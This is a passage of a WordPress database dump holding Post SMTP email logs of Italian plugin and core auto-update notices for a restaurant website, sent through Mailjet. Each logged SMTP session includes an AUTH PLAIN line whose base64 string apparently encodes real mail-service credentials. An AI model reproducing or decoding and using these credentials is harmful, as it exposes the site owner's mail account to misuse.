aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nVi sono anche alcuni plugin o temi con aggiornamenti disponibili. Aggiornali ora:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/\n\nIl team di WordPress\n'),(58531,4614,'original_headers',''),(58532,4614,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <4252e70795294169a4539df33fd7129c@ristorantesolymar.it>\r\nSubject: =?UTF-8?Q?[Sol=20Y=20Mar]=20Il=20tuo=20sito=20=C3=A8=20aggiornato=20?=\r\n =?UTF-8?Q?a=20WordPress=205.6.1?=\r\nDate: Thu, 04 Feb 2021 01:02:34 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Il tuo sito su https://www.ristorantesolymar.it/vecchio =C3=A8 sta=\r\nto aggiornato automaticamente a WordPress 5.6.1.=0A=0ANon =C3=A8 richies=\r\nta da parte tua alcuna altra operazione. Per altre informazioni sulla ve=\r\nrsione 5.6.1 vedi la schermata Informazioni su WordPress:=0Ahttps://www.=\r\nristorantesolymar.it/vecchio/wp-admin/about.php=0A=0ASe hai problemi di=\r\n qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di support=\r\no su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.=0Aht=\r\ntps://it.wordpress.org/support/forums/=0A=0AVi sono anche alcuni plugin=\r\n o temi con aggiornamenti disponibili. Aggiornali ora:=0Ahttps://www.ris=\r\ntorantesolymar.it/vecchio/wp-admin/=0A=0AIl team di WordPress=0A\r\n.\r\n250 OK queued as 9d917381-e674-4ca4-acb0-652819a3f210\r\n'),(58533,4617,'solution','All good, mail sent.'),(58534,4617,'success','1'),(58535,4617,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58536,4617,'to_header','webmaster@baldisserri.com'),(58537,4617,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58538,4617,'original_to','webmaster@baldisserri.com'),(58539,4617,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58540,4617,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.7 a 4.0.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58541,4617,'original_headers',''),(58542,4617,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <4256166b225bab62faa31cca2e1f3f60@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Mon, 08 Feb 2021 14:40:03 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Really Simple SSL (da versio=\r\nne 4.0.7 a 4.0.8)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogn=\r\no di aiuto, i volontari dei forum di supporto su https://it.wordpress.or=\r\ng/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/suppo=\r\nrt/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as eb8926e4-00fd-4ad0-a3de-868e1655fac3\r\n'),(58543,4618,'solution','All good, mail sent.'),(58544,4618,'success','1'),(58545,4618,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58546,4618,'to_header','webmaster@baldisserri.com'),(58547,4618,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58548,4618,'original_to','webmaster@baldisserri.com'),(58549,4618,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58550,4618,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- WP Fastest Cache (da versione 0.9.1.4 a 0.9.1.5)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58551,4618,'original_headers',''),(58552,4618,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <5f355c6f971eaac2c7f3e2ec5f905f82@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 10 Feb 2021 03:08:00 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- WP Fastest Cache (da version=\r\ne 0.9.1.4 a 0.9.1.5)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bis=\r\nogno di aiuto, i volontari dei forum di supporto su https://it.wordpress=\r\n..org/forums/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/su=\r\npport/forums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as ed544db8-7ade-4c78-a06a-c0d0e11812ee\r\n'),(58553,4619,'solution','All good, mail sent.'),(58554,4619,'success','1'),(58555,4619,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58556,4619,'to_header','webmaster@baldisserri.com'),(58557,4619,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58558,4619,'original_to','webmaster@baldisserri.com'),(58559,4619,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58560,4619,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Yoast SEO (da versione 15.7 a 15.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58561,4619,'original_headers',''),(58562,4619,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <9aa534fc4e1db333fdbe3ca9d52071ab@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 10 Feb 2021 13:39:59 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Yoast SEO (da versione 15.7=\r\n a 15.8)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di aiut=\r\no, i volontari dei forum di supporto su https://it.wordpress.org/forums/=\r\n possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/forums=\r\n/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as b7b06aaf-4339-4a45-a98c-c4f3e99191ed\r\n'),(58563,4620,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58564,4620,'solution','All good, mail sent.'),(58565,4620,'success','1'),(58566,4620,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58567,4620,'to_header','webmaster@baldisserri.com'),(58568,4620,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58569,4620,'original_to','webmaster@baldisserri.com'),(58570,4620,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58571,4620,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.74 a 3.76)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58572,4620,'original_headers',''),(58573,4620,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <f2d1425b0983faa14297bbb486b701fd@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Thu, 11 Feb 2021 14:52:48 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Popup Builder (da versione 3=\r\n..74 a 3.76)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di a=\r\niuto, i volontari dei forum di supporto su https://it.wordpress.org/foru=\r\nms/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/for=\r\nums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as 34e6ff62-de79-4993-b8d0-8d52b618b917\r\n'),(58574,4621,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58575,4621,'solution','All good, mail sent.'),(58576,4621,'success','1'),(58577,4621,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58578,4621,'to_header','webmaster@baldisserri.com'),(58579,4621,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58580,4621,'original_to','webmaster@baldisserri.com'),(58581,4621,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58582,4621,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Post SMTP (da versione 2.0.20 a 2.0.21)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58583,4621,'original_headers',''),(58584,4621,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.20 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <ab5042ec9540ec8958cfcc2a6ec93080@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Fri, 12 Feb 2021 12:33:00 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Post SMTP (da versione 2.0.2=\r\n0 a 2.0.21)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di a=\r\niuto, i volontari dei forum di supporto su https://it.wordpress.org/foru=\r\nms/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/for=\r\nums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as c19928e8-56a4-4839-a5f8-9688cd2b1986\r\n'),(58585,4622,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58586,4622,'solution','All good, mail sent.'),(58587,4622,'success','1'),(58588,4622,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58589,4622,'to_header','webmaster@baldisserri.com'),(58590,4622,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58591,4622,'original_to','webmaster@baldisserri.com'),(58592,4622,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58593,4622,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Post SMTP (da versione 2.0.21 a 2.0.22)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58594,4622,'original_headers',''),(58595,4622,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.21 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <ad2488543259f990b45b6f41b4ec50e6@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente\r\nDate: Wed, 17 Feb 2021 13:07:28 +0000\r\nContent-Transfer-Encoding: quoted-printable\r\nContent-Disposition: inline\r\nMIME-Version: 1.0\r\n\r\nCiao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchi=\r\no sono stati aggiornati automaticamente all\'ultima versione. Non =C3=A8=\r\n richiesta da parte tua alcuna altra operazione.=0A=0A=0AQuesti plugin o=\r\nra sono aggiornati all\'ultima versione:=0A- Post SMTP (da versione 2.0.2=\r\n1 a 2.0.22)=0A=0A=0ASe hai problemi di qualsiasi tipo o hai bisogno di a=\r\niuto, i volontari dei forum di supporto su https://it.wordpress.org/foru=\r\nms/ possono riuscire ad aiutarti.=0Ahttps://it.wordpress.org/support/for=\r\nums/=0A=0AIl team di WordPress\r\n.\r\n250 OK queued as cca20a48-c646-45b1-9765-475dfad1568b\r\n'),(58596,4623,'_oembed_d47958ce6a38c71cc46ab62c68f83f0a','{{unknown}}'),(58597,4623,'solution','All good, mail sent.'),(58598,4623,'success','1'),(58599,4623,'from_header','Sol Y Mar <notifiche@ristorantesolymar.it>'),(58600,4623,'to_header','webmaster@baldisserri.com'),(58601,4623,'transport_uri','smtp:tls:plain://in-v3.mailjet.com:25'),(58602,4623,'original_to','webmaster@baldisserri.com'),(58603,4623,'original_subject','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente'),(58604,4623,'original_message','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue (da versione 3.1.4 a 3.1.5)\n- Smash Balloon Instagram Feed (da versione 2.7 a 2.8)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress'),(58605,4623,'original_headers',''),(58606,4623,'session_transcript','smtp:tls:plain://in-v3.mailjet.com:25\n\n220 in.mailjet.com ESMTP Mailjet\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-STARTTLS\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nSTARTTLS\r\n220 2.0.0 Ready to start TLS\r\nEHLO ristorantesolymar.it\r\n250-smtpin.mailjet.com\r\n250-PIPELINING\r\n250-SIZE 15728640\r\n250-VRFY\r\n250-ETRN\r\n250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-AUTH=PLAIN LOGIN DIGEST-MD5 CRAM-MD5\r\n250-ENHANCEDSTATUSCODES\r\n250-8BITMIME\r\n250 SMTPUTF8\r\nAUTH PLAIN\r\n334 \r\nADc4ZDI0YmRkZmJlMDAxYjU1YzNiNDg1MTVlOGYwMDFkADJlMDFkOGZkNTFmNTc0ZjU1OTYzOWY3YjdkNWUwYTFi\r\n235 2.7.0 Authentication successful\r\nMAIL FROM:<notifiche@ristorantesolymar.it>\r\n250 2.1.0 Ok\r\nRCPT TO:<webmaster@baldisserri.com>\r\n250 2.1.5 Ok\r\nDATA\r\n354 End data with <CR><LF>.<CR><LF>\r\nX-Mailer: Postman SMTP 2.0.22 for WordPress (https://wordpress.org/plugins/post-smtp/)\r\nContent-Type: text/plain; charset=UTF-8\r\nFrom: Sol Y Mar <notifiche@ristorantesolymar.it>\r\nSender: notifiche@ristorantesolymar.it\r\nTo: webmaster@baldisserri.com\r\nMessage-Id: <951026fda2dca90d692f98009ebef775@ristorantesolymar.it>\r\nSubject: [Sol Y Mar] Alcuni plugin sono stati aggiornati 